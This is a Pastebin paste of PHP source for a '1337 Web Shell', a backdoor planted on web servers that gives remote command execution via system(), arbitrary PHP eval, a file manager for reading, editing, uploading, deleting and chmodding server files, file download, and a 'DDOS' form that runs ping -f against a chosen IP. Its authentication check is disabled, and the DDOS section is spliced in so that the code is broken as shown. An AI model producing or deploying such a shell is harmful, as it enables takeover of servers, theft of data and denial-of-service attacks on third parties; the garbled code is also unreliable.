FeRR4L

Untitled

Jan 3rd, 2014
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 16.91 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4. $xpass = '662f707d5491e9bce8238a6c0be92190'; //password for access in sha1 ("root" as default)
  5.  
  6. /*****[COLOR CONFIG]*****/
  7. $text = '#FF0000'; //text color
  8. $background = '#1A1A1A'; //background color
  9.  
  10. /*****[PHP CONFIG]*****/
  11. @set_time_limit(0);
  12. @ini_set('max_execution_time',0);
  13. @ignore_user_abort(1);
  14.  
  15. /*****[CODE START]*****/
  16. $self = $_SERVER['PHP_SELF'];
  17. $act = $_GET['action'];
  18. $user = $_ENV['USERNAME'];
  19.  
  20. /*****[AUTH CODE]*****/
  21. $pass = $_POST['xpass'];
  22. $login = "
  23.    <title>1337 Web Shell</title>
  24.    <center>Enter Password:<br>
  25.    <form method='POST' action=".$self.">
  26.   <input type='password' name='xpass'><br><input type='submit'></form>";
  27. if(isset($pass))
  28. {
  29.     setcookie("1337", $pass, time()+86400);
  30.     print ("<META http-equiv='refresh' content='0'>");
  31. }
  32. if (1 != 1)
  33. {
  34.     print ($login);
  35. }
  36. else
  37. {
  38. if (isset($_POST['1337_DIR']))
  39.    {
  40.        $x = $_POST['1337_DIR'];
  41.        setcookie("1337_DIR", $x, time()+86400);
  42.       print ("<META http-equiv='refresh' content='0'>");
  43.    }
  44. elseif ($act !== "load")
  45. {
  46.  
  47. /*****[MAIN]*****/
  48. if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on"){$smode = "ON";}else{$smode = "OFF";}
  49. print ("
  50. <title>1337 Web Shell</title>
  51. <META http-equiv='expires' content='0'>
  52. <head><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head>
  53. <body text='".$text."' bgcolor='".$background."' link='".$text."' vlink='".$text."' alink='".$text."'>
  54. <center><b><font size='5'>1337 WEB SHELL</b>
  55. </font></b></div>
  56. <div align='center'>
  57. <table border='1' width='70%' bordercolorlight='".$text."' cellspacing='0' id='table1'>
  58. <tr><td colspan='2'><font style='font-size: 11.5pt'>
  59. &nbsp;System: ".php_uname()."<br>
  60. &nbsp;Server: ".$_SERVER['SERVER_SOFTWARE']."<br>
  61. &nbsp;Safe mode: ".$smode."<br>
  62. &nbsp;Host info: ".$_SERVER['HTTP_HOST'].' - '.$_SERVER['SERVER_ADDR']."
  63. </font></tr><tr><td>
  64. &nbsp;&nbsp;<a href='".$self."'>Shell</a>
  65. &nbsp;&nbsp;<a href='".$self."?action=serverinfo'>ServInfo</a>
  66. &nbsp;&nbsp;<a href='".$self."?action=files'>Files</a>
  67. &nbsp;&nbsp;<a href='".$self."?action=eval'>PHP</a>
  68. &nbsp;&nbsp;<a href='".$self."?action=xpack'>X-toolz</a>
  69. &nbsp;&nbsp;<a href='".$self."?action=ddos'>DDOS</a>
  70.  
  71. </td></tr><tr><td>");
  72.  
  73. /*****[DDOS]*****/
  74. elseif($act == "ddos")
  75. {
  76.  
  77. <body bgcolor="#000000">
  78. <font face="Courier New" color="green">
  79. <center>Enter Target<br>
  80. <form method="POST">
  81. <input type="text" name="ip" value='127.0.0.1'>
  82. <input type="submit" value="fire"></center>
  83. <?php
  84. $v = $_POST['ip'];
  85. $c = 'ping -f $v';
  86. shell_exec($c);
  87. ?>
  88. /*****[SERVER INFO]*****/
  89. if ($act == "serverinfo")
  90. {
  91.     if(function_exists('curl_version')>0){$curl = "ON";}else{$curl = "OFF";}
  92.     (($disabled=ini_get('disable_functions'))==')?$disabled='NO':str_replace(array(',',';'), ', ', $disabled);
  93.     if(get_magic_quotes_gpc()>0){$mq="ON";}else{$mq="OFF";}
  94.     if(function_exists('apache_get_modules')>0){$apache=implode(', ',apache_get_modules());}
  95.     if(function_exists('get_loaded_extensions')>0){$phprun=implode(', ',get_loaded_extensions());}
  96.     if(function_exists('gzencode')>0){$gzip="ON";}else{$gzip="OFF";}
  97.     if(function_exists('mysql_connect')>0){$mysql="ON";}else{$mysql="OFF";}
  98.     if(function_exists('mssql_connect')>0){$mssql="ON";}else{$mssql="OFF";}
  99.     if(function_exists('pg_connect')>0){$PostgreSQL="ON";}else{$PostgreSQL="OFF";}
  100.     if(function_exists('ocilogon')>0){$Oracle="ON";}else{$Oracle="OFF";}
  101.     print("
  102.     <table><td>
  103.    <b>User:</b> " . $user ."<br>
  104.    <b>cURL:</b> " . $curl. "<br>
  105.    <b>gZip:</b> " . $gzip. "<br>
  106.    <b>MySQL:</b> " . $mysql. "<br>
  107.    <b>MsSQL:</b> " . $mssql. "<br>
  108.    <b>PostgreSQL:</b> " . $PostgreSQL. "<br>
  109.    <b>Oracle:</b> " . $Oracle. "<br>
  110.    <b>Magic Quotes:</b> ". $mq ."<br>
  111.    <b>Disabled PHP functions:</b> " . $disabled ."<br>
  112.    <b>PHP Modules:</b> " . $phprun ."<br>
  113.    <b>Apache Modules:</b> " . $apache ."<br>");
  114. }
  115.  
  116. /*****[PHP Eval]*****/
  117. elseif($act == "eval")
  118. {
  119.     $eval=$_POST['eval'];
  120.     print("
  121.     <table><form action='".$self."?action=eval' method='POST'><tr><td>
  122.     <textarea name='eval' style='color: ".$text."; background-color: ".$background."' cols='82' rows='10'></textarea>
  123.     <input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'></td></tr>
  124.    <td style='border-style: solid; border-width: 1px'>");
  125.     if(isset($eval))
  126.     {
  127.         $eval=str_replace('\"', "'", $eval);
  128.         eval($eval);
  129.     }
  130. }
  131.  
  132. /*****[ENCODER]*****/
  133. elseif($act == "encoder")
  134. {
  135.     $code=$_POST['code'];
  136.     print("
  137.     <table>
  138.     <form method='POST'>
  139.     <tr><td><input size='80' style='color: ".$text."; background-color: ".$background."' name='code'>
  140.     <input type='submit' value='enc0de' style='color: ".$text."; background-color: ".$background."'>
  141.     </td></tr>");
  142.     if(isset($code))
  143.     {
  144.         print ("
  145.         <tr><td>
  146.         Text: ". $code ."<br>
  147.         Base 64 encoded: &nbsp;&nbsp;&nbsp;".base64_encode($code)."<br>
  148.         Base 64 decoded: &nbsp;&nbsp;&nbsp;".base64_decode($code)."<br>
  149.         Hex encoded text: &nbsp;&nbsp;&nbsp;".bin2hex($code)."<br>
  150.         Hex decoded text: &nbsp;&nbsp;&nbsp;".@htmlspecialchars(pack("H*",$code))."<br>
  151.         MD5 encoded text: &nbsp;".md5($code)."<br>
  152.         MD5 decoded text: &nbsp;<a href='http://gdataonline.com/qkhash.php?mode=txt&hash=".$code."'>view</a><br>
  153.         SHA1 encoded text: ".sha1($code)."<br></td>");
  154.     }
  155. }
  156.  
  157. /*****[X-PACK]*****/
  158. elseif($act == "xpack")
  159. {
  160.     print("<center>
  161.     &nbsp;&nbsp;<a href='".$self."?action=encoder'>Encoder</a><br>
  162.    ");
  163. }
  164.  
  165. /*****[FILES]*****/
  166. elseif($act == "files")
  167. {
  168.     if (isset($_COOKIE['1337_DIR']))
  169.    {
  170.        $x = $_COOKIE['1337_DIR'];
  171.    }
  172.    else
  173.    {
  174.         $x = dirname($_SERVER['SCRIPT_FILENAME']);
  175.     }
  176.     $xdir=@chdir($x);
  177.     if($_GET["view"] !== NULL)
  178.     {
  179.        $view=$_GET["view"];
  180.         ob_clean();
  181.         $z = file_get_contents($view);
  182.         print("
  183.         <table>
  184.         <tr><td>
  185.         <a href='javascript:history.back();'>Go back</a>
  186.        <form method='POST'>
  187.         <textarea name='content' style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  188.         print (str_replace('</textarea>', '<//textarea>', $z));
  189.         print ("</textarea><br><input type='submit' value='Save' style='color: ".$text."; background-color: ".$background."'></form>");
  190.        if(isset($_POST['content']))
  191.        {
  192.            $content = $_POST['content'];
  193.           $content = str_replace("<//textarea>", "</textarea>", $content);
  194.           $content = str_replace('\"', '"', $content);
  195.           $content = str_replace("\'", "'", $content);
  196.           $f = fopen($view, 'w');
  197.           fputs ($f, $content);
  198.           fclose ($f);
  199.           print ("<META http-equiv='refresh' content='0'>");
  200.        }
  201.     }
  202.     elseif($_GET["up"] !== NULL)
  203.     {
  204.         print("<center><b>Upload!<br></b><form enctype='multipart/form-data' action='".$self."?action=files' method='POST'>
  205.        <input type='file' style='color: ".$text."; background-color: ".$background."' size='40' name='upl' style='color: ".$text."; background-color: ".$background."'><br>
  206.        TO: <input type='text' name='dir' size='40' style='color: ".$text."; background-color: ".$background."' value=".$x.">
  207.        <input type='submit' style='color: ".$text."; background-color: ".$background."' value='GO!'></form>");
  208.     }
  209.     elseif($_GET["md"] !== NULL)
  210.     {
  211.         print("<form method='POST' action='".$self."?action=files'>
  212.        <center><b>Make dir!</b><br><input type='text' style='color: ".$text."; background-color: ".$background."' name='makedir'>
  213.        <input type='submit' value='make' style='color: ".$text."; background-color: ".$background."'></form>");
  214.     }
  215.     elseif($_GET["deletef"] !== NULL)
  216.     {
  217.         if(@unlink($_GET["deletef"]))
  218.        {
  219.            print ("<center>File \"".$_GET['deletef']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  220.        }
  221.        else
  222.        {
  223.       print ("<center>File \"".$_GET['deletef']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  224.        }
  225.     }
  226.     elseif($_GET["deleted"] !== NULL)
  227.     {
  228.         if(@rmdir($_GET["deleted"]))
  229.        {
  230.            print ("<center>Dir \"".$_GET['deleted']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  231.        }
  232.        else
  233.        {
  234.            print ("<center>Dir \"".$_GET['deleted']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  235.        }
  236.     }
  237.     elseif($_GET["rename"] !== NULL)
  238.     {
  239.        if(isset($_POST['rename']))
  240.       {
  241.           @rename($_GET['rename'], $_POST['rename']) or die ("<center>".$_GET['rename']."\" can`t be renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  242.          print ("<center>".$_GET['rename']."\" successful renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  243.       }
  244.       else
  245.       {
  246.             print ("<center>Rename ".$_GET['rename']."<br><form method='POST'>to:
  247.           <input size='45' value='".dirname($_GET['rename'])."/' name='rename' style='color: ".$text."; background-color: ".$background."'>
  248.           <input type='submit' value='Rename' style='color: ".$text."; background-color: ".$background."'>");
  249.       }
  250.    }
  251.     elseif($_GET["chmod"] !== NULL)
  252.     {
  253.        if(isset($_POST['chmod']))
  254.       {
  255.           @chmod($_GET['chmod'], $_POST['chmod']) or die ("<center>Chmod for ".$_GET['chmod']." can`t be changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  256.          print ("<center>Chmod for ".$_GET['chmod']." successful changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  257.       }
  258.       else
  259.       {
  260.             print ("<center>Chmod ".$_GET['cmod']."<br><form method='POST'>
  261.           <input size='45' value='0777' name='chmod' style='color: ".$text."; background-color: ".$background."'>
  262.           <input type='submit' value='Chmod' style='color: ".$text."; background-color: ".$background."'>");
  263.       }
  264.    }
  265.     elseif($_POST["makedir"] !== NULL)
  266.     {
  267.         if(@mkdir($_POST["makedir"]))
  268.        {
  269.            print ("<center>Dir \"".$_POST["makedir"]."\" successful created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  270.        }
  271.        else
  272.        {
  273.           print ("<center>Dir \"".$_POST["makedir"]."\" can`t be created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  274.        }
  275.     }
  276.     elseif (isset($HTTP_POST_FILES["upl"]))
  277.     {
  278.         if(@copy($HTTP_POST_FILES["upl"]["tmp_name"],
  279.        $_POST['dir']."/".$HTTP_POST_FILES["upl"]["name"]))
  280.         {
  281.             print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" successful uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  282.         }
  283.        else
  284.        {
  285.            print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" can`t be uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  286.        }
  287.     }
  288.     else
  289.     {
  290.        function chmodr($name)
  291.         {
  292.             if (fileperms($name) & 00400){print "r";}else{print "-";}
  293.            if (fileperms($name) & 00200){print "w";}else{print "-";}
  294.             if (fileperms($name) & 00100){print "x";}else{print "-";}
  295.            print ("/");
  296.            if (fileperms($name) & 00040){print "r";}else{print "-";}
  297.            if (fileperms($name) & 00020){print "w";}else{print "-";}
  298.            if (fileperms($name) & 00010){print "x";}else{print "-";}
  299.            print ("/");
  300.            if (fileperms($name) & 00004){print "r";}else{print "-";}
  301.            if (fileperms($name) & 00002){print "w";}else{print "-";}
  302.            if (fileperms($name) & 00001){print "x";}else{print "-";}
  303.         }
  304.       if (PHP_OS != "WINNT"){$nowin = 1;}
  305.       if (!($dir = @opendir($x)))
  306.       {
  307.            die ("<center>Access denied on <b>".$x."<b><br><table><td><form method='POST'>
  308.             <input type='hidden' name='1337_DIR' value=".dirname($_SERVER['SCRIPT_FILENAME']).">
  309.             <input type='submit' value='Go home' style='color: ".$text."; background-color: ".$background."'>
  310.            </form>");
  311.        }
  312.        print ("<table width='695'><td colspan='6'><table><td><form method='POST'>
  313.         <input size='63' style='color: ".$text."; background-color: ".$background."' name='1337_DIR' value=".$x.">
  314.         <input type='submit' value='Go!' style='color: ".$text."; background-color: ".$background."'>
  315.        </form>
  316.       </table></center>&nbsp;<tr>
  317.       <td width='40'>Type/Name<td width='16'>Size(Byte)<td width='80'>Perms<td width='20'>Owner<td width='20'>Group<td width='20'>&nbsp;<tr>");
  318.         print ("<td width='40'>dir&nbsp;&nbsp;<b>.</b><td width='25'>---<td width='80'>");
  319.       chmodr($x."/.");
  320.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/.")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/.")); print($k[name]);}else{print("---");} print("<td width='200'>");
  321.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/.'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/.'>Chmod</a><tr>");
  322.         print ("<td width='40'>dir&nbsp;&nbsp;<b>..</b><td width='25'>---<td width='80'>");
  323.       chmodr($x."/..");
  324.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/..")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/..")); print($k[name]);}else{print("---");} print("<td width='200'>");
  325.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/..'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/..'>Chmod</a><tr>");
  326.         while($name = readdir($dir))
  327.         {
  328.           if (is_dir($name))
  329.           {
  330.              if ($name !== "." and $name !== "..")
  331.             {
  332.                    print ("<td width='40'>dir&nbsp;&nbsp;<b>".$name."</b><td width='25'>---<td width='80'>");
  333.                     chmodr($name);
  334.                  print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  335.                   print ("<a href='".$self."?action=files&deleted=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  336.             }
  337.          }
  338.       }
  339.       $dir = @opendir($x);
  340.       while($name = readdir($dir))
  341.         {
  342.          if (!is_dir($name))
  343.          {
  344.                 print ("<td width='40'>".filetype($name)."&nbsp;&nbsp;".$name."<td width='25'>".filesize($name)."<td width='80'>");
  345.                 chmodr($name);
  346.              print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  347.               print ("<a href='".$self."?action=load&load=".$x."/".$name."'>Load</a>&nbsp;|&nbsp;<a href='".$self."?action=files&view=".$x."/".$name."'>Edit</a>&nbsp;|&nbsp;<a href='".$self."?action=files&deletef=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  348.          }
  349.        }
  350.        print ("
  351.        </td><tr></td></td><tr></td><tr><td colspan='6' rowspan='2'><center><b><a href='".$self."?action=files&md'>Make Directory</a><br><a href='".$self."?action=files&up'>Uploader</a></b></td>
  352.        ");
  353.     }
  354. }
  355. /*****[SHELL]*****/
  356. else
  357. {
  358.     print("
  359.     <table>
  360.     <form action='".$self."' method='POST'>
  361.     <tr><td>
  362.     <input size='80' style='color: ".$text."; background-color: ".$background."' name='cmd'><input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'>
  363.     </td></tr><tr><td>
  364.     <textarea style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  365.     if (isset($_POST['cmd']))
  366.     {
  367.     system($_POST['cmd']);
  368.     }
  369.     print ("</textarea>");
  370. }
  371. }
  372.  
  373. /*****[FILE DOWNLOAD]*****/
  374. else
  375. {
  376.     $load=$_GET["load"];
  377.     ob_clean();
  378.     header("Content-type: application/octet-stream/".filetype($load));
  379.     header("Content-length: ".filesize($load));
  380.     header("Content-disposition: attachment; filename=".$load);
  381.     $z = file_get_contents($load);
  382.     print $z;
  383.     exit;
  384. }
  385. }
  386.  
  387. /*****[ GOOD LUCK =) ]*****/
  388.  
  389. ?>
Add Comment
Please, Sign In to add comment